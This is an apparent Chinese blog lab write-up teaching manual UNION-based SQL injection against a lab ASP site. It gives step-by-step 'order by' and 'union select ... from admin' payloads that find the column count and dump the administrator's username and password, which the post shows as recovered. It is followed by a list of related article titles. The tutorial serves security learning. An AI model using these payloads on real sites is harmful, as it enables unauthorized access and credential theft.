SQL注入原理--手工联合查询注入技术
来源:互联网 发布:兰大网络教育平台登录 编辑:程序博客网 时间:2024/06/06 09:51
**
实验目的:理解联合查询原理、学习联合查询过程
**实验原理:
1、链接后面添加【order by 11(数字任意)】根据页面返回结果,来判断站点中的字段数目
2、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】进行联合查询,来暴露可查询的字段编号
3、根据上一步得到的字段编号,查询语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】直接暴露管理员用户名和密码
实验环境:
本机:192.168.1.2
目标机:192.168.1.3
一、检测字段长度
1、随便点击一个链接http://192.168.1.3:8008/onews.asp? id=45,在后面添加语句【order by 11】,页面显示正常
2、同样添加【order by 12】页面报错,所以此站字段长度为11
二、暴露管理员用户、密码
1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3
2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码
3、到此,即可知道管理员用户名:admin和密码:bfpms
注:此博客纯属用于本人学习,未进允许不得转载。
0 0
- SQL注入原理--手工联合查询注入技术
- SQL注入原理-手工注入access数据库
- SQL注入之联合查询注入
- SQL手工注入语句及原理
- ASP使用联合查询语句手工注入办法
- SQL注入中的一些原理笔记(手工注入)
- SQL注入(手工注入)
- SQL注入之联合注入
- 手工SQL注入教程
- 手工SQL注入入侵
- sql手工注入
- SQL手工注入大全
- SQL 手工注入大全
- sql手工注入
- SQL手工注入测试
- SQL手工注入
- SQL注入手工检测
- SQL手工注入——数字型注入
- Elasticsearch学习笔记(五)批量操作
- 了解点机器学习
- Android注解式绑定控件
- 人工智能时代的降临
- 洛谷 P1280 尼克的任务
- SQL注入原理--手工联合查询注入技术
- The Child and Set
- mysql-5.7.17免安装版环境搭建
- POJ3299 Humidex
- Elasticsearch学习笔记(六)Elasticsearch分布式集群值helloWord
- B. Unary
- 无题。
- 微信小程序带参传递的界面跳转的两种方式
- Think PHP 学习笔记 6-7.CURD演示